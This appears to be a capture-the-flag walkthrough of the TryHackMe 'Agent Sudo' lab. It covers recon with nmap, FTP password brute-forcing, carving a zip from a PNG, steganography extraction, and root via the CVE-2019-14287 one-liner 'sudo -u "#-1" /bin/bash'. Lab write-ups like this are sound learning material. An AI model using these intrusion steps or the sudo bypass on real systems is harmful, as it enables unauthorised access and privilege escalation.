Run a scan with the ever-useful nmap:
kali@kali:~/ctf/thm/agent_sudo$ sudo nmap -Pn -sV 10.10.11.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 22:55 UTC
Nmap scan report for 10.10.11.35
Host is up (1.5s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.82 seconds
Accessing the web page has a hint
Dear agents,
Use your own codename as user-agent to access the site.
From, Agent R
After trying different user-agent headers on http requests, I tried the single letter R.
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
Trying the other letters of the alphabet leads to a hit on C which redirects to another page:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
Now we have a possible username, chris, and can try and bruteforce a weak password. We get a hit on that for ftp credentials and downloads a couple images, cutie.png and cute-alien.jpg.
Viewing the cutie.png in a hex editor we stumble across what looks like a filename: To_agentR.txt. You can concatenate files together and some image formats will still work just fine when concatenated with something like a zip file. The zip format header has a magic number of 0x04034b50 at the front, and we can indeed find that in this image file:
00008700: 6082 504b 0304 3303 0100 6300 a6a3 5d4f `.PK..3...c...]O
00008710: 0000 0000 6200 0000 5600 0000 0d00 0b00 ....b...V.......
00008720: 546f 5f61 6765 6e74 522e 7478 7401 9907 To_agentR.txt...
00008730: 0002 0041 4501 0800 4673 cae7 1457 9045 ...AE...Fs...W.E
00008740: 67aa 61c4 cf3a f94e 649f 827e 5964 ce57 g.a..:.Nd..~Yd.W
00008750: 5c5f 7a23 9c48 fb99 2c8e a8cb ffe5 1d03 \_z#.H..,.......
00008760: 755e 0ca8 61a5 a3dc babf a618 784b 8507 u^..a.......xK..
00008770: 5f0e f476 c6da 8261 805b d0a4 309d b388 _..v...a.[..0...
00008780: 35ad 3261 3e3d c5d7 e87c 0f91 c0b5 e64e 5.2a>=...|.....N
00008790: 4969 f382 486c b676 7ae6 504b 0102 3f03 Ii..Hl.vz.PK..?.
000087a0: 3303 0100 6300 a6a3 5d4f 0000 0000 6200 3...c...]O....b.
000087b0: 0000 5600 0000 0d00 2f00 0000 0000 0000 ..V...../.......
000087c0: 2080 a481 0000 0000 546f 5f61 6765 6e74 .......To_agent
000087d0: 522e 7478 740a 0020 0000 0000 0001 0018 R.txt.. ........
000087e0: 0080 4577 7754 8ed5 0100 65da d354 8ed5 ..EwwT....e..T..
000087f0: 0100 65da d354 8ed5 0101 9907 0002 0041 ..e..T.........A
00008800: 4501 0800 504b 0506 0000 0000 0100 0100 E...PK..........
00008810: 6a00 0000 9800 0000 0000 j.........
You can't just rename the file, or at least it didn't work for me:
kali@kali:~/ctf/thm/agent_sudo$ cp cutie.png cutie.zip
kali@kali:~/ctf/thm/agent_sudo$ unzip cutie.zip
Archive: cutie.zip
warning [cutie.zip]: 34562 extra bytes at beginning or within zipfile
(attempting to process anyway)
skipping: To_agentR.txt need PK compat. v5.1 (can do v4.6)
But you can use the dd utility to copy the part we're interested to its own zip file:
kali@kali:~/ctf/thm/agent_sudo$ dd if=cutie.png of=cutie.zip ibs=1 skip=34562
280+0 records in
0+1 records out
280 bytes copied, 0.001117 s, 251 kB/s
The zip file has a password as well. Kind of using a hint from the CTF we know it needs a 5 letter password. After trying a few random things, we hit on a word that follows the theme, *****. Got lucky by using the CTF itself as a clue.
kali@kali:~/ctf/thm/agent_sudo$ more To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
That string looks encoded, not rot13, so maybe base64?
>>> import base64
>>> base64.b64decode('QXJlYTUx')
b'Area51'
There we go, probably a password, and we got two images. Steghide is a favorite in CTFs that have some basic steganography, so lets try that on the jpg.
kali@kali:~/ctf/thm/agent_sudo$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
Hi james,
Glad you find this message. Your login password is ***********!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
With that we can log in to the box with ssh and discover another image to download. What is the name of the incident in the image? Google image search helps us figure out this was known as the Roswell alien autopsy
Running linpeas on the system points out the version of sudo installed is 1.8.21p2. Since the name of this CTF is "Agent Sudo", one imagines a privilage escalation we might be looking for would involve sudo. The corresponding CVE is CVE-2019-14287.
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
To exploit this vulnerability all we need to do is run sudo with a user of -1.
james@agent-sudo:~$ sudo -u "#-1" /bin/bash
root@agent-sudo:~# cd /root
root@agent-sudo:/root# ls -la
total 32
drwx------ 4 root root 4096 Oct 29 2019 .
drwxr-xr-x 24 root root 4096 Oct 29 2019 ..
-rw------- 1 root root 1952 Oct 29 2019 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4096 Oct 29 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 197 Oct 29 2019 root.txt
drwx------ 2 root root 4096 Oct 29 2019 .ssh
root@agent-sudo:/root# cat root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
********************************
By,
DesKel a.k.a Agent R